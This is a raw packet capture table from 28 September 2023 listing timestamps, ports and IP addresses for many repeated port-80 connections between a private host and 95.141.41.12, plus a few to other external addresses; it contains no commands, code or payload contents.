Sep 28, 2023 06:04:11.612402916 CEST	80	50200	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:11.618504047 CEST	80	50200	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:11.618571043 CEST	50200	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.732223034 CEST	50200	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.732637882 CEST	50203	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.919272900 CEST	80	50200	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:11.919389963 CEST	50200	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.919992924 CEST	80	50203	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:11.920079947 CEST	50203	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.920277119 CEST	50203	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.108189106 CEST	80	50203	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:12.113439083 CEST	80	50203	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:12.113610029 CEST	50203	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.217004061 CEST	50203	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.217436075 CEST	50204	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.405096054 CEST	80	50203	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:12.405397892 CEST	50203	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.415908098 CEST	80	50204	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:12.416109085 CEST	50204	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.416254044 CEST	50204	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.615087986 CEST	80	50204	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:12.620618105 CEST	80	50204	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:12.620697021 CEST	50204	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.732394934 CEST	50204	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.732858896 CEST	50205	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.930052042 CEST	80	50205	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:12.930263996 CEST	50205	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.930352926 CEST	50205	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:12.931041002 CEST	80	50204	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:12.931118965 CEST	50204	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.127703905 CEST	80	50205	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:13.132760048 CEST	80	50205	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:13.133037090 CEST	50205	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.247777939 CEST	50205	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.248172998 CEST	50207	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.445422888 CEST	80	50205	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:13.445612907 CEST	50205	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.447691917 CEST	80	50207	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:13.447803020 CEST	50207	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.448112011 CEST	50207	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.648614883 CEST	80	50207	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:13.652796030 CEST	80	50207	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:13.652998924 CEST	50207	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.763745070 CEST	50207	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.763999939 CEST	50208	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.902606964 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:04:13.957241058 CEST	80	50208	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:13.957367897 CEST	50208	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.957611084 CEST	50208	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:13.963689089 CEST	80	50207	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:13.963778973 CEST	50207	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.150799990 CEST	80	50208	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:14.155374050 CEST	80	50208	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:14.155445099 CEST	50208	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.263628006 CEST	50208	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.263959885 CEST	50209	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.448359013 CEST	80	50209	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:14.448528051 CEST	50209	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.448668957 CEST	50209	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.457179070 CEST	80	50208	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:14.457285881 CEST	50208	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.633018017 CEST	80	50209	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:14.638396025 CEST	80	50209	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:14.638633013 CEST	50209	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.763964891 CEST	50209	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.764383078 CEST	50211	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.948617935 CEST	80	50209	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:14.948892117 CEST	50209	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.965270042 CEST	80	50211	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:14.965493917 CEST	50211	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:14.965764046 CEST	50211	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:15.166915894 CEST	80	50211	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:15.171539068 CEST	80	50211	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:15.171736002 CEST	50211	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:15.396348000 CEST	50211	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:15.396800995 CEST	50212	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:15.594005108 CEST	80	50212	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:15.594295979 CEST	50212	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:15.596726894 CEST	80	50211	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:15.596797943 CEST	50211	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:15.818356991 CEST	50212	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.016526937 CEST	80	50212	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:16.020683050 CEST	80	50212	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:16.020931005 CEST	50212	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.138478994 CEST	50212	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.138772964 CEST	50213	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.326598883 CEST	80	50213	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:16.326857090 CEST	50213	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.326941967 CEST	50213	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.336090088 CEST	80	50212	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:16.336366892 CEST	50212	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.514884949 CEST	80	50213	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:16.518918037 CEST	80	50213	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:16.519217968 CEST	50213	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.550944090 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:04:16.552249908 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:04:16.623050928 CEST	50213	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.623370886 CEST	50215	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.762706995 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:04:16.811439991 CEST	80	50213	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:16.811836004 CEST	50213	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.821492910 CEST	80	50215	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:16.821588993 CEST	50215	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:16.821856022 CEST	50215	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.020046949 CEST	80	50215	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:17.024460077 CEST	80	50215	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:17.024626017 CEST	50215	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.138869047 CEST	50215	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.139367104 CEST	50216	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.336014986 CEST	80	50216	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:17.336256981 CEST	50216	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.336395979 CEST	50216	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.337040901 CEST	80	50215	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:17.337111950 CEST	50215	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.532864094 CEST	80	50216	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:17.537487030 CEST	80	50216	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:17.537579060 CEST	50216	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.654397964 CEST	50216	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.654865026 CEST	50217	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.851428032 CEST	80	50216	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:17.851632118 CEST	50216	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.859918118 CEST	80	50217	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:17.859993935 CEST	50217	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:17.860210896 CEST	50217	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.065426111 CEST	80	50217	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:18.066660881 CEST	80	50217	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:18.066924095 CEST	50217	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.170425892 CEST	50217	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.170983076 CEST	50219	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.364931107 CEST	80	50219	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:18.365034103 CEST	50219	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.365281105 CEST	50219	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.375915051 CEST	80	50217	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:18.376059055 CEST	50217	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.559278011 CEST	80	50219	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:18.564171076 CEST	80	50219	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:18.564488888 CEST	50219	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.669624090 CEST	50219	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.669986963 CEST	50220	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.864240885 CEST	80	50219	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:18.864329100 CEST	50219	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.874789953 CEST	80	50220	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:18.874875069 CEST	50220	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:18.875067949 CEST	50220	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.079687119 CEST	80	50220	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:19.081310034 CEST	80	50220	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:19.081377029 CEST	50220	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.185120106 CEST	50220	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.185437918 CEST	50222	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.390480995 CEST	80	50220	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:19.390556097 CEST	80	50222	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:19.390569925 CEST	50220	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.390656948 CEST	50222	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.390909910 CEST	50222	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.595758915 CEST	80	50222	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:19.598365068 CEST	80	50222	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:19.598572969 CEST	50222	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.700865984 CEST	50222	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.701344967 CEST	50223	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.892236948 CEST	80	50223	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:19.892370939 CEST	50223	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.892605066 CEST	50223	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:19.906124115 CEST	80	50222	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:19.906358957 CEST	50222	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.083538055 CEST	80	50223	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:20.088469028 CEST	80	50223	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:20.088752985 CEST	50223	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.201338053 CEST	50223	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.201800108 CEST	50224	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.392091036 CEST	80	50223	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:20.392294884 CEST	50223	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.406371117 CEST	80	50224	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:20.406563044 CEST	50224	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.406794071 CEST	50224	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.611308098 CEST	80	50224	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:20.616884947 CEST	80	50224	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:20.617069006 CEST	50224	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.732181072 CEST	50224	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.732569933 CEST	50225	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.926613092 CEST	80	50225	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:20.926728010 CEST	50225	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.926964998 CEST	50225	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:20.936789989 CEST	80	50224	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:20.936954975 CEST	50224	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.121109009 CEST	80	50225	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:21.122577906 CEST	80	50225	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:21.122824907 CEST	50225	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.232429981 CEST	50225	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.232850075 CEST	50227	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.417486906 CEST	80	50227	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:21.417848110 CEST	50227	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.417965889 CEST	50227	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.426429033 CEST	80	50225	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:21.426738977 CEST	50225	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.603266001 CEST	80	50227	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:21.607161999 CEST	80	50227	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:21.607279062 CEST	50227	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.716763973 CEST	50227	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.717093945 CEST	50228	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.901633978 CEST	80	50227	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:21.901720047 CEST	50227	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.903935909 CEST	80	50228	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:21.904068947 CEST	50228	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:21.904254913 CEST	50228	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:22.100115061 CEST	80	50228	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:22.692471981 CEST	80	50228	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:22.692693949 CEST	50228	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:22.795034885 CEST	50228	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:22.795336962 CEST	50230	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:22.986649990 CEST	80	50230	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:22.986718893 CEST	80	50228	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:22.986771107 CEST	50230	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:22.986953020 CEST	50230	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:22.987080097 CEST	50228	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.174649954 CEST	80	50230	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:23.179414988 CEST	80	50230	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:23.179486036 CEST	50230	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.294991016 CEST	50230	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.295432091 CEST	50231	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.482840061 CEST	80	50230	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:23.483043909 CEST	50230	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.494873047 CEST	80	50231	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:23.495070934 CEST	50231	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.495287895 CEST	50231	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.692045927 CEST	80	50231	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:23.707321882 CEST	80	50231	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:23.707526922 CEST	50231	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.810383081 CEST	50231	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.810846090 CEST	50232	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.997920036 CEST	80	50232	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:23.998013020 CEST	50232	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:23.998225927 CEST	50232	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.007383108 CEST	80	50231	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.007462978 CEST	50231	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.185472012 CEST	80	50232	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.190782070 CEST	80	50232	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.191072941 CEST	50232	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.294576883 CEST	50232	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.294903040 CEST	50234	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.479676008 CEST	80	50234	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.479907990 CEST	50234	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.480042934 CEST	50234	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.481815100 CEST	80	50232	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.481997013 CEST	50232	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.664002895 CEST	80	50234	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.668576002 CEST	80	50234	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.668642998 CEST	50234	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.779377937 CEST	50234	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.779597044 CEST	50235	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.963999987 CEST	80	50234	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.964257002 CEST	50234	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.976454020 CEST	80	50235	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:24.976577044 CEST	50235	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:24.976785898 CEST	50235	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.173376083 CEST	80	50235	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:25.177993059 CEST	80	50235	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:25.178183079 CEST	50235	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.294347048 CEST	50235	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.294819117 CEST	50236	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.493918896 CEST	80	50236	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:25.494119883 CEST	50236	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.494236946 CEST	80	50235	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:25.494293928 CEST	50235	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.494373083 CEST	50236	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.693473101 CEST	80	50236	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:25.698915958 CEST	80	50236	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:25.699173927 CEST	50236	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.810278893 CEST	50236	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:25.810509920 CEST	50238	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.004582882 CEST	80	50238	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.004798889 CEST	50238	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.005068064 CEST	50238	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.009998083 CEST	80	50236	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.010174990 CEST	50236	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.199321985 CEST	80	50238	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.204238892 CEST	80	50238	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.204560041 CEST	50238	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.310262918 CEST	50238	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.310750008 CEST	50239	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.495419025 CEST	80	50239	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.495742083 CEST	50239	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.496016026 CEST	50239	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.504285097 CEST	80	50238	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.504368067 CEST	50238	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.680351019 CEST	80	50239	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.684571981 CEST	80	50239	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.685059071 CEST	50239	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.796014071 CEST	50239	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.796283007 CEST	50240	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.981216908 CEST	80	50239	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.981506109 CEST	50239	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.993051052 CEST	80	50240	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:26.993221045 CEST	50240	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:26.993428946 CEST	50240	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.190493107 CEST	80	50240	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:27.194561958 CEST	80	50240	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:27.194823027 CEST	50240	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.310457945 CEST	50240	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.310784101 CEST	50242	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.504513025 CEST	80	50242	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:27.504725933 CEST	50242	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.505019903 CEST	50242	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.507255077 CEST	80	50240	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:27.507358074 CEST	50240	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.699057102 CEST	80	50242	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:27.702960014 CEST	80	50242	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:27.703247070 CEST	50242	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.815815926 CEST	50242	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:27.816339016 CEST	50243	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.010122061 CEST	80	50242	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:28.010437012 CEST	50242	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.013461113 CEST	80	50243	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:28.013664007 CEST	50243	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.013804913 CEST	50243	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.210751057 CEST	80	50243	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:28.215715885 CEST	80	50243	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:28.215975046 CEST	50243	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.325658083 CEST	50243	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.325853109 CEST	50244	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.520797968 CEST	80	50244	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:28.520927906 CEST	50244	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.521122932 CEST	50244	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.522880077 CEST	80	50243	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:28.523091078 CEST	50243	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.714817047 CEST	80	50244	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:28.719611883 CEST	80	50244	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:28.719831944 CEST	50244	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.830568075 CEST	50244	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:28.831352949 CEST	50246	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.024761915 CEST	80	50244	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.024811029 CEST	80	50246	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.024929047 CEST	50244	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.024971008 CEST	50246	80	192.168.2.3	95.141.41.12
